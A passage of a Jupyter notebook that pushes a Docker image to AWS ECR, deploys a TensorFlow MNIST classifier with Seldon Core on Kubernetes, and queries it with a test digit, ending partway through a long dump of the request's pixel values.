"### Now prepare docker image\nWe need to first tag the docker image before we can push it",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\ndocker tag deep-mnist:0.1 \"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository\"",
"_____no_output_____"
]
],
[
[
"### We now login to aws through docker so we can access the repository",
"_____no_output_____"
]
],
[
[
"!`aws ecr get-login --no-include-email --region us-west-2`",
"WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nWARNING! Your password will be stored unencrypted in /home/alejandro/.docker/config.json.\nConfigure a credential helper to remove this warning. See\nhttps://docs.docker.com/engine/reference/commandline/login/#credentials-store\n\nLogin Succeeded\n"
]
],
[
[
"### And push the image\nMake sure you add your AWS Account ID",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\ndocker push \"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository\"",
"The push refers to repository [271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository]\nf7d0d000c138: Preparing\n987f3f1afb00: Preparing\n00d16a381c47: Preparing\nbb01f50d544a: Preparing\nfcb82c6941b5: Preparing\n67290e35c458: Preparing\nb813745f5bb3: Preparing\nffecb18e9f0b: Preparing\nf50f856f49fa: Preparing\n80b43ad4adf9: Preparing\n14c77983a1cf: Preparing\na22a5ac18042: Preparing\n6257fa9f9597: Preparing\n578414b395b9: Preparing\nabc3250a6c7f: Preparing\n13d5529fd232: Preparing\n67290e35c458: Waiting\nb813745f5bb3: Waiting\nffecb18e9f0b: Waiting\nf50f856f49fa: Waiting\n80b43ad4adf9: Waiting\n6257fa9f9597: Waiting\n14c77983a1cf: Waiting\na22a5ac18042: Waiting\n578414b395b9: Waiting\nabc3250a6c7f: Waiting\n13d5529fd232: Waiting\n987f3f1afb00: Pushed\nfcb82c6941b5: Pushed\nbb01f50d544a: Pushed\nf7d0d000c138: Pushed\nffecb18e9f0b: Pushed\nb813745f5bb3: Pushed\nf50f856f49fa: Pushed\n67290e35c458: Pushed\n14c77983a1cf: Pushed\n578414b395b9: Pushed\n80b43ad4adf9: Pushed\n13d5529fd232: Pushed\n6257fa9f9597: Pushed\nabc3250a6c7f: Pushed\n00d16a381c47: Pushed\na22a5ac18042: Pushed\nlatest: digest: sha256:19aefaa9d87c1287eb46ec08f5d4f9a689744d9d0d0b75668b7d15e447819d74 size: 3691\n"
]
],
[
[
"## Running the Model\nWe will now run the model.\n\nLet's first have a look at the file we'll be using to trigger the model:",
"_____no_output_____"
]
],
[
[
"!cat deep_mnist.json",
"{\r\n \"apiVersion\": \"machinelearning.seldon.io/v1alpha2\",\r\n \"kind\": \"SeldonDeployment\",\r\n \"metadata\": {\r\n \"labels\": {\r\n \"app\": \"seldon\"\r\n },\r\n \"name\": \"deep-mnist\"\r\n },\r\n \"spec\": {\r\n \"annotations\": {\r\n \"project_name\": \"Tensorflow MNIST\",\r\n \"deployment_version\": \"v1\"\r\n },\r\n \"name\": \"deep-mnist\",\r\n \"oauth_key\": \"oauth-key\",\r\n \"oauth_secret\": \"oauth-secret\",\r\n \"predictors\": [\r\n {\r\n \"componentSpecs\": [{\r\n \"spec\": {\r\n \"containers\": [\r\n {\r\n \"image\": \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository:latest\",\r\n \"imagePullPolicy\": \"IfNotPresent\",\r\n \"name\": \"classifier\",\r\n \"resources\": {\r\n \"requests\": {\r\n \"memory\": \"1Mi\"\r\n }\r\n }\r\n }\r\n ],\r\n \"terminationGracePeriodSeconds\": 20\r\n }\r\n }],\r\n \"graph\": {\r\n \"children\": [],\r\n \"name\": \"classifier\",\r\n \"endpoint\": {\r\n\t\t\t\"type\" : \"REST\"\r\n\t\t },\r\n \"type\": \"MODEL\"\r\n },\r\n \"name\": \"single-model\",\r\n \"replicas\": 1,\r\n\t\t\"annotations\": {\r\n\t\t \"predictor_version\" : \"v1\"\r\n\t\t}\r\n }\r\n ]\r\n }\r\n}\r\n"
]
],
[
[
"Now let's trigger seldon to run the model.\n\nWe basically have a yaml file, where we want to replace the value \"REPLACE_FOR_IMAGE_AND_TAG\" for the image you pushed",
"_____no_output_____"
]
],
[
[
"%%bash\nexport AWS_ACCOUNT_ID=\"\"\nexport AWS_REGION=\"us-west-2\"\nif [ -z \"$AWS_ACCOUNT_ID\" ]; then\n echo \"ERROR: Please provide a value for the AWS variables\"\n exit 1\nfi\n\nsed 's|REPLACE_FOR_IMAGE_AND_TAG|'\"$AWS_ACCOUNT_ID\"'.dkr.ecr.'\"$AWS_REGION\"'.amazonaws.com/seldon-repository|g' deep_mnist.json | kubectl apply -f -",
"error: unable to recognize \"STDIN\": Get https://461835FD3FF52848655C8F09FBF5EEAA.yl4.us-west-2.eks.amazonaws.com/api?timeout=32s: dial tcp: lookup 461835FD3FF52848655C8F09FBF5EEAA.yl4.us-west-2.eks.amazonaws.com on 1.1.1.1:53: no such host\n"
]
],
[
[
"And let's check that it's been created.\n\nYou should see an image called \"deep-mnist-single-model...\".\n\nWe'll wait until STATUS changes from \"ContainerCreating\" to \"Running\"",
"_____no_output_____"
]
],
[
[
"!kubectl get pods",
"NAME READY STATUS RESTARTS AGE\r\nambassador-5475779f98-7bhcw 1/1 Running 0 21m\r\nambassador-5475779f98-986g5 1/1 Running 0 21m\r\nambassador-5475779f98-zcd28 1/1 Running 0 21m\r\ndeep-mnist-single-model-42ed9d9-fdb557d6b-6xv2h 2/2 Running 0 18m\r\n"
]
],
[
[
"## Test the model\nNow we can test the model, let's first find out what is the URL that we'll have to use:",
"_____no_output_____"
]
],
[
[
"!kubectl get svc ambassador -o jsonpath='{.status.loadBalancer.ingress[0].hostname}' ",
"a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com"
]
],
[
[
"We'll use a random example from our dataset",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt\n# This is the variable that was initialised at the beginning of the file\ni = [0]\nx = mnist.test.images[i]\ny = mnist.test.labels[i]\nplt.imshow(x.reshape((28, 28)), cmap='gray')\nplt.show()\nprint(\"Expected label: \", np.sum(range(0,10) * y), \". One hot encoding: \", y)",
"_____no_output_____"
]
],
[
[
"We can now add the URL above to send our request:",
"_____no_output_____"
]
],
[
[
"from seldon_core.seldon_client import SeldonClient\nimport math\nimport numpy as np\n\nhost = \"a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com\"\nport = \"80\" # Make sure you use the port above\nbatch = x\npayload_type = \"ndarray\"\n\nsc = SeldonClient(\n gateway=\"ambassador\", \n ambassador_endpoint=host + \":\" + port,\n namespace=\"default\",\n oauth_key=\"oauth-key\", \n oauth_secret=\"oauth-secret\")\n\nclient_prediction = sc.predict(\n data=batch, \n deployment_name=\"deep-mnist\",\n names=[\"text\"],\n payload_type=payload_type)\n\nprint(client_prediction)",
"Success:True message:\nRequest:\ndata {\n names: \"text\"\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.3294117748737335\n }\n values {\n number_value: 0.7254902124404907\n }\n values {\n number_value: 0.6235294342041016\n }\n values {\n number_value: 0.5921568870544434\n }\n values {\n number_value: 0.2352941334247589\n }\n values {\n number_value: 0.1411764770746231\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.8705883026123047\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9450981020927429\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.7764706611633301\n }\n values {\n number_value: 0.6666666865348816\n }\n values {\n number_value: 0.2039215862751007\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.26274511218070984\n }\n values {\n number_value: 0.44705885648727417\n }\n values {\n number_value: 0.2823529541492462\n }\n values {\n number_value: 0.44705885648727417\n }\n values {\n number_value: 0.6392157077789307\n }\n values {\n number_value: 0.8901961445808411\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.8823530077934265\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9803922176361084\n }\n values {\n number_value: 0.8980392813682556\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.5490196347236633\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.06666667014360428\n }\n values {\n number_value: 0.25882354378700256\n }\n values {\n number_value: 0.05490196496248245\n }\n values {\n number_value: 0.26274511218070984\n }\n values {\n number_value: 0.26274511218070984\n }\n values {\n number_value: 0.26274511218070984\n }\n values {\n number_value: 0.23137256503105164\n }\n values {\n number_value: 0.08235294371843338\n }\n values {\n number_value: 0.9254902601242065\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.41568630933761597\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.32549020648002625\n }\n values {\n number_value: 0.9921569228172302\n }\n values {\n number_value: 0.8196079134941101\n }\n values {\n number_value: 0.07058823853731155\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.08627451211214066\n }\n values {\n number_value: 0.9137255549430847\n }\n values {\n number_value: 1.0\n }\n values {\n number_value: 0.32549020648002625\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.5058823823928833\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9333333969116211\n }\n values {\n number_value: 0.1725490242242813\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.23137256503105164\n }\n values {\n number_value: 0.9764706492424011\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.24313727021217346\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.5215686559677124\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.7333333492279053\n }\n values {\n number_value: 0.019607843831181526\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.03529411926865578\n }\n values {\n number_value: 0.803921639919281\n }\n values {\n number_value: 0.9725490808486938\n }\n values {\n number_value: 0.22745099663734436\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.4941176772117615\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.7137255072593689\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.29411765933036804\n }\n values {\n number_value: 0.9843137860298157\n }\n values {\n number_value: 0.9411765336990356\n }\n values {\n number_value: 0.22352942824363708\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.07450980693101883\n }\n values {\n number_value: 0.8666667342185974\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.6509804129600525\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.011764707043766975\n }\n values {\n number_value: 0.7960785031318665\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.8588235974311829\n }\n values {\n number_value: 0.13725490868091583\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.14901961386203766\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.3019607961177826\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.12156863510608673\n }\n values {\n number_value: 0.8784314393997192\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.45098042488098145\n }\n values {\n number_value: 0.003921568859368563\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n 